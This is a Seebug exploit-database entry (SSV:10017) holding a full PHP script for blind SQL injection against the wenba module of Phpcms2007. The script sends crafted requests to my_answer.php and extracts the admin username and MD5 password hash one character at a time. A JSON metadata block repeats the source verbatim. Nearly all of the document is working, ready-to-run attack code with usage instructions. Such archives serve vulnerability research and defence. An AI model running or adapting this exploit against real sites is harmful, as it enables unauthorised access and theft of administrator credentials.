ID SSV:10017
Type seebug
Reporter Root
Modified 2008-11-12T00:00:00
Description
No description provided by source.
<?
print_r('
--------------------------------------------------------------------------------
Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit
BY oldjun[S.U.S](http://www.oldjun.com)
--------------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
die;
}
function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$prefix="phpcms_";
$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{echo "Error... check the path!\r\n\r\n"; die;}
/*get $prefix*/
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("in your SQL syntax",$html))
{
$temp=explode("FROM ",$html);
if(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}
if($temp2[0])
$prefix=$temp2[0];
echo "[+]prefix -> ".$prefix."\r\n";
}
echo "[~]exploting now,plz waiting...\r\n\r\n";
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\r\n\r\n"; die;}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\r\n";break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
$j=1;$username="";
while (!strstr($username,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\r\n";break;}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}
print_r('
--------------------------------------------------------------------------------
[+]username -> '.$username.'
[+]password(md5 32λ) -> '.$password.'
--------------------------------------------------------------------------------
');
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>
{"href": "https://www.seebug.org/vuldb/ssvid-10017", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-12T00:00:00", "title": "Phpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10017", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2008-11-12T00:00:00", "sourceData": "\n <?\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nPhpcms2007 (wenba)blind SQL injection / admin credentials disclosure exploit\r\nBY oldjun[S.U.S](http://www.oldjun.com)\r\n--------------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path\r\nhost: target server (ip/hostname),without"http://"\r\npath: path to phpcms\r\nExample:\r\nphp '.$argv[0].' localhost /\r\n--------------------------------------------------------------------------------\r\n');\r\ndie;\r\n}\r\n\r\nfunction sendpacketii($packet)\r\n{\r\nglobal $host, $html;\r\n$ock=fsockopen(gethostbyname($host),'80');\r\nif (!$ock) {\r\necho 'No response from '.$host; die;\r\n}\r\nfputs($ock,$packet);\r\n$html='';\r\nwhile (!feof($ock)) {\r\n$html.=fgets($ock);\r\n}\r\nfclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$prefix="phpcms_";\r\n$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";\r\n\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))\r\n{echo "Error... check the path!\\r\\n\\r\\n"; die;}\r\n\r\n/*get $prefix*/\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/union/**/select HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Cookie: ".$cookie."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\n//echo $html;\r\nif (eregi("in your SQL syntax",$html))\r\n{\r\n$temp=explode("FROM ",$html);\r\nif(isset($temp[1])){$temp2=explode("wenba_answer",$temp[1]);}\r\nif($temp2[0])\r\n$prefix=$temp2[0];\r\necho "[+]prefix -> ".$prefix."\\r\\n";\r\n}\r\necho "[~]exploting now,plz waiting...\\r\\n\\r\\n";\r\n\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=1 HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\nif (eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {echo "Error... There is no data in wenba,please register two users.One asks then the other answers!\\r\\n\\r\\n"; die;}\r\n\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password="";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$chars))\r\n{\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(password,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\nif (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$password.=chr($i);echo"[+]pwd:".$password."\\r\\n";break;}\r\n}\r\nif ($i==255) {die("Exploit failed...");}\r\n}\r\n$j++;\r\n}\r\n\r\n$j=1;$username="";\r\nwhile (!strstr($username,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$packet ="GET ".$path."wenba/my_answer.php?status=1/**/or/**/1=(select/**/count(*)/**/from/**/".$prefix."member/**/where/**/ASCII(SUBSTRING(username,".$j.",1))=".$i."/**/and/**/userid=1) HTTP/1.0\\r\\n";\r\n$packet.="Host: ".$host."\\r\\n";\r\n$packet.="Connection: Close\\r\\n\\r\\n";\r\nsendpacketii($packet);\r\nif (!eregi(chr(182).chr(212).chr(178).chr(187).chr(198).chr(240),$html)) {$username.=chr($i);echo"[+]username:".$username."\\r\\n";break;}\r\nif ($i==255) {die("Exploit failed...");}\r\n}\r\n$j++;\r\n}\r\nprint_r('\r\n--------------------------------------------------------------------------------\r\n[+]username -> '.$username.'\r\n[+]password(md5 32\u03bb) -> '.$password.'\r\n--------------------------------------------------------------------------------\r\n');\r\nfunction is_hash($hash)\r\n{\r\nif (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}\r\nelse {return false;}\r\n}\r\nif (is_hash($password)) {echo "Exploit succeeded...";}\r\nelse {echo "Exploit failed...";}\r\n?>\n ", "id": "SSV:10017", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:36:59", "reporter": "Root", "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645338446}}
{}
